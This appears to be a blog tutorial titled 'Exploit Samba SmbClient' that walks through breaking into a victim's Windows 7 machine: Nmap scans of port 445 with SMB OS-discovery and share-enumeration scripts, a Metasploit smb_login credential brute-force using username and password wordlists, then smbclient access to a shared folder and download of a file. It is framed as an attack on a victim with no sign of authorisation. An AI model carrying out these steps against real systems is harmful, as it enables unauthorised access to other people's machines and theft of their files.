Exploit Samba "SmbClient"

Such as FTP (File Transfer Protocol) samba include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on.

in this case we have to get the victim to allow shared folders or files.


Equipments :
1. SmbClient
2. Nmap
3. Metasploit

The firstStep. scanning port the victim's ip-address using Nmap.
in here that we need right port is port  445  microsoft-ds.

# Nmap (Victim Ip-Address)





seen in the picture above. I am lucky :)

now, let us look the contents of the port

# nmap -p445 --script=smb-os-discovery (Victim Ip-Address)

--script=smb-os-discovery : Attempts to determine the operating system, computer name, domain, workgroup, and current time over the SMB protocol (ports 445 or 139).


seen in the picture above, it turns out the victim we use Operating System Windows 7 Ultimate. 
Computer Name And NetBIOS Name is a ANONYMOUS-PC.

now, See the documentation for the smb library.

# nmap -p445 --script=smb-enum-shares (Victim Ip-Address)


seen above, the victim has a shared folder =))
seems this exploitation will work =))

Now, run a SmbClient.

# smbclient -L (Victim Ip-Address) -U (Computer Name) -p (port 445)


damn >_<, we are prompted to enter a password, how do we get the password, it will be impossible to succeed by guessing passwords owned by the victim.

I will not give up, let's proceed with metasploit ^ _ ^

# msfconsole
msf  > use auxiliary/scanner/smb/smb_login
msf  auxiliary (smb_login) > set RHOSTS Victim Ip-Address (Range)
msf  auxiliary (smb_login) > set PASS_FILE /Path/Your/Password_wordlist/*.txt
msf  auxiliary (smb_login) > set USER_FILE /Path/Your/Username_wordlist/*.txt
msf  auxiliary (smb_login) > run


yeah, i'm succeeded to get the password :)

now, we back to login for get a list of shares available on a host

# smbclient -L (Victim Ip-Address) -U (Computer Name) -p (port 445)


^_^

Now, we try to access an existing disk C on the victim's computer

# smbclient //Victim Ip-Address/C -U (Computer Name) -p (Port 445)



Failed ??? Status Bad For Network Name.

try to access an existing disk Smb-Shares on the victim's computer

# smbclient //Victim Ip-Address//Smb-Shares -U (Computer Name) -p (Port 445)



Success :)

then I download a file that is in the folder

smb: \> get Smb-Shared-file.txt


And its results are



Regards
Hidemichi-Hiroyuki a.k.a [H2]

Comments

Post a Comment

Do Not Fuckin Spamming

Popular posts from this blog

Decrypt MD5 $Wordpress

Configure Pure-FTP on Kali Linux